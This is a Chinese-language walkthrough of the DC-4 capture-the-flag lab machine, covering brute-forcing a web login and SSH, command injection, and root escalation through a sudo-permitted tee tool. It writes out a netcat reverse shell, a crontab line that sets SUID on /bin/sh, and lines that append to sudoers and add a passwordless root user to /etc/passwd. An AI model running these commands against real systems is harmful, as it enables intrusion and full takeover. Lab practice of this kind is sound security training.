跳转至

DC 4

DC-4

nmap 扫描端口

image.png

浏览器访问一下,一个登陆界面,admin作为用户名 password爆破一下

image.png

image.png

登上以后

image.png

命令执行!?

image.png

抓包改一下,发现可以执行其他命令

image.png

nc 反弹个shell(我第一时间想到的是 echo 写个 shell 进去,大佬的是 nc 直接用)
nc -e /bin/sh 192.168.149.141 6666

image.png

image.png

还是用 python 生成一个好点的交互

image.png

在 jim 目录下面发现一个 backups 里面有 old-password

image.png

尝试爆破登录 ssh?哦吼,中奖

image.png

参数解释:
-l jim            指定爆破账号为 jim
-w 10            指定每个线程的回应时间为 10S
-P pwd.txt     指定密码字典为 pwd.txt
-t 10             指定爆破线程为 10 个
-v                 指定显示爆破过程
-f                 查找到第一个可以使用的账号和密码的时候停止破解

ssh jim@192.168.149.160
密码:jibril04

image.png

在 /var/mail 目录下查看邮件信息

image.png

image.png

得到 charles 的密码:^xHhA&hvim0y,su 切换一下

image.png

sudo -l 看一下,发现 teehee 不需要密码就可以 root 权限运行

image.png

image.png

用来将标准输入复制到文件,也复制到标准输出

使用 teehee /etc/crontab 编辑一下
输入:* * * * * root chmod 4777 /bin/sh

image.png

再执行:ls -al  /bin/dash,然后 /bin/sh 就可以了

image.png

另两种方法

1、
echo "charles ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers
sudo su root,然后输入 charles 的密码

image.png

2、
如果能写在 passwd 里面一个 /bin/sh 的,跟 root 一样的话就可以

image.png

echo "yichen::0:0:::/bin/sh" | sudo teehee -a /etc/passwd
su yichen

image.png

原文: https://www.yuque.com/hxfqg9/web/ttamkh